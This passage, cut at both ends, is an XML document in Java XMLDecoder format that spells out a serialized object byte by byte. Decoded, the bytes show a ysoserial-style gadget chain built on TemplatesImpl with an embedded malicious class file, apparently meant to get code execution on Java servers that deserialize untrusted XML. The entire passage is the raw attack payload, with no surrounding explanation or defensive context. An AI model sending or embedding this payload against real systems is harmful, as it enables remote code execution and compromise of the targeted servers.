index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void index=\"593\"><byte>84</byte></void><void index=\"594\"><byte>114</byte></void><void index=\"595\"><byte>97</byte></void><void index=\"596\"><byte>110</byte></void><void index=\"597\"><byte>115</byte></void><void index=\"598\"><byte>108</byte></void><void index=\"599\"><byte>101</byte></void><void index=\"600\"><byte>116</byte></void><void index=\"601\"><byte>80</byte></void><void index=\"602\"><byte>97</byte></void><void index=\"603\"><byte>121</byte></void><void index=\"604\"><byte>108</byte></void><void index=\"605\"><byte>111</byte></void><void index=\"606\"><byte>97</byte></void><void index=\"607\"><byte>100</byte></void><void index=\"608\"><byte>59</byte></void><void index=\"609\"><byte>1</byte></void><void index=\"610\"><byte>0</byte></void><void index=\"611\"><byte>9</byte></void><void index=\"612\"><byte>116</byte></void><void index=\"613\"><byte>114</byte></void><void index=\"614\"><byte>97</byte></void><void index=\"615\"><byte>110</byte></void><void index=\"616\"><byte>115</byte></void><void index=\"617\"><byte>102</byte></void><void index=\"618\"><byte>111</byte></void><void index=\"619\"><byte>114</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>1</byte></void><void index=\"622\"><byte>0</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>40</byte></void><void index=\"625\"><byte>76</byte></void><void index=\"626\"><byte>99</byte></void><void index=\"627\"><byte>111</byte></void><void index=\"628\"><byte>109</byte></void><void index=\"629\"><byte>47</byte></void><void index=\"630\"><byte>115</byte></void><void index=\"631\"><byte>117</byte></void><void index=\"632\"><byte>110</byte></void><void index=\"633\"><byte>47</byte></void><void index=\"634\"><byte>111</byte></void><void index=\"635\"><byte>114</byte></void><void index=\"636\"><byte>103</byte></void><void index=\"637\"><byte>47</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>112</byte></void><void index=\"640\"><byte>97</byte></void><void index=\"641\"><byte>99</byte></void><void index=\"642\"><byte>104</byte></void><void index=\"643\"><byte>101</byte></void><void index=\"644\"><byte>47</byte></void><void index=\"645\"><byte>120</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>108</byte></void><void index=\"648\"><byte>97</byte></void><void index=\"649\"><byte>110</byte></void><void index=\"650\"><byte>47</byte></void><void index=\"651\"><byte>105</byte></void><void index=\"652\"><byte>110</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>101</byte></void><void index=\"655\"><byte>114</byte></void><void index=\"656\"><byte>110</byte></void><void index=\"657\"><byte>97</byte></void><void index=\"658\"><byte>108</byte></void><void index=\"659\"><byte>47</byte></void><void index=\"660\"><byte>120</byte></void><void index=\"661\"><byte>115</byte></void><void index=\"662\"><byte>108</byte></void><void index=\"663\"><byte>116</byte></void><void index=\"664\"><byte>99</byte></void><void index=\"665\"><byte>47</byte></void><void index=\"666\"><byte>68</byte></void><void index=\"667\"><byte>79</byte></void><void index=\"668\"><byte>77</byte></void><void index=\"669\"><byte>59</byte></void><void index=\"670\"><byte>91</byte></void><void index=\"671\"><byte>76</byte></void><void index=\"672\"><byte>99</byte></void><void index=\"673\"><byte>111</byte></void><void index=\"674\"><byte>109</byte></void><void index=\"675\"><byte>47</byte></void><void index=\"676\"><byte>115</byte></void><void index=\"677\"><byte>117</byte></void><void index=\"678\"><byte>110</byte></void><void index=\"679\"><byte>47</byte></void><void index=\"680\"><byte>111</byte></void><void index=\"681\"><byte>114</byte></void><void index=\"682\"><byte>103</byte></void><void index=\"683\"><byte>47</byte></void><void index=\"684\"><byte>97</byte></void><void index=\"685\"><byte>112</byte></void><void index=\"686\"><byte>97</byte></void><void index=\"687\"><byte>99</byte></void><void index=\"688\"><byte>104</byte></void><void index=\"689\"><byte>101</byte></void><void index=\"690\"><byte>47</byte></void><void index=\"691\"><byte>120</byte></void><void index=\"692\"><byte>109</byte></void><void index=\"693\"><byte>108</byte></void><void index=\"694\"><byte>47</byte></void><void index=\"695\"><byte>105</byte></void><void index=\"696\"><byte>110</byte></void><void index=\"697\"><byte>116</byte></void><void index=\"698\"><byte>101</byte></void><void index=\"699\"><byte>114</byte></void><void index=\"700\"><byte>110</byte></void><void index=\"701\"><byte>97</byte></void><void index=\"702\"><byte>108</byte></void><void index=\"703\"><byte>47</byte></void><void index=\"704\"><byte>115</byte></void><void index=\"705\"><byte>101</byte></void><void index=\"706\"><byte>114</byte></void><void index=\"707\"><byte>105</byte></void><void index=\"708\"><byte>97</byte></void><void index=\"709\"><byte>108</byte></void><void index=\"710\"><byte>105</byte></void><void index=\"711\"><byte>122</byte></void><void index=\"712\"><byte>101</byte></void><void index=\"713\"><byte>114</byte></void><void index=\"714\"><byte>47</byte></void><void index=\"715\"><byte>83</byte></void><void index=\"716\"><byte>101</byte></void><void index=\"717\"><byte>114</byte></void><void index=\"718\"><byte>105</byte></void><void index=\"719\"><byte>97</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>105</byte></void><void index=\"722\"><byte>122</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>116</byte></void><void index=\"725\"><byte>105</byte></void><void index=\"726\"><byte>111</byte></void><void index=\"727\"><byte>110</byte></void><void index=\"728\"><byte>72</byte></void><void index=\"729\"><byte>97</byte></void><void index=\"730\"><byte>110</byte></void><void index=\"731\"><byte>100</byte></void><void index=\"732\"><byte>108</byte></void><void index=\"733\"><byte>101</byte></void><void index=\"734\"><byte>114</byte></void><void index=\"735\"><byte>59</byte></void><void index=\"736\"><byte>41</byte></void><void index=\"737\"><byte>86</byte></void><void index=\"738\"><byte>1</byte></void><void index=\"739\"><byte>0</byte></void><void index=\"740\"><byte>8</byte></void><void index=\"741\"><byte>100</byte></void><void index=\"742\"><byte>111</byte></void><void index=\"743\"><byte>99</byte></void><void index=\"744\"><byte>117</byte></void><void index=\"745\"><byte>109</byte></void><void index=\"746\"><byte>101</byte></void><void index=\"747\"><byte>110</byte></void><void index=\"748\"><byte>116</byte></void><void index=\"749\"><byte>1</byte></void><void index=\"750\"><byte>0</byte></void><void index=\"751\"><byte>45</byte></void><void index=\"752\"><byte>76</byte></void><void index=\"753\"><byte>99</byte></void><void index=\"754\"><byte>111</byte></void><void index=\"755\"><byte>109</byte></void><void index=\"756\"><byte>47</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>117</byte></void><void index=\"759\"><byte>110</byte></void><void index=\"760\"><byte>47</byte></void><void index=\"761\"><byte>111</byte></void><void index=\"762\"><byte>114</byte></void><void index=\"763\"><byte>103</byte></void><void index=\"764\"><byte>47</byte></void><void index=\"765\"><byte>97</byte></void><void index=\"766\"><byte>112</byte></void><void index=\"767\"><byte>97</byte></void><void index=\"768\"><byte>99</byte></void><void index=\"769\"><byte>104</byte></void><void index=\"770\"><byte>101</byte></void><void index=\"771\"><byte>47</byte></void><void index=\"772\"><byte>120</byte></void><void index=\"773\"><byte>97</byte></void><void index=\"774\"><byte>108</byte></void><void index=\"775\"><byte>97</byte></void><void index=\"776\"><byte>110</byte></void><void index=\"777\"><byte>47</byte></void><void index=\"778\"><byte>105</byte></void><void index=\"779\"><byte>110</byte></void><void index=\"780\"><byte>116</byte></void><void index=\"781\"><byte>101</byte></void><void index=\"782\"><byte>114</byte></void><void index=\"783\"><byte>110</byte></void><void index=\"784\"><byte>97</byte></void><void index=\"785\"><byte>108</byte></void><void index=\"786\"><byte>47</byte></void><void index=\"787\"><byte>120</byte></void><void index=\"788\"><byte>115</byte></void><void index=\"789\"><byte>108</byte></void><void index=\"790\"><byte>116</byte></void><void index=\"791\"><byte>99</byte></void><void index=\"792\"><byte>47</byte></void><void index=\"793\"><byte>68</byte></void><void index=\"794\"><byte>79</byte></void><void index=\"795\"><byte>77</byte></void><void index=\"796\"><byte>59</byte></void><void index=\"797\"><byte>1</byte></void><void index=\"798\"><byte>0</byte></void><void index=\"799\"><byte>8</byte></void><void index=\"800\"><byte>104</byte></void><void index=\"801\"><byte>97</byte></void><void index=\"802\"><byte>110</byte></void><void index=\"803\"><byte>100</byte></void><void index=\"804\"><byte>108</byte></void><void index=\"805\"><byte>101</byte></void><void index=\"806\"><byte>114</byte></void><void index=\"807\"><byte>115</byte></void><void index=\"808\"><byte>1</byte></void><void index=\"809\"><byte>0</byte></void><void index=\"810\"><byte>66</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void 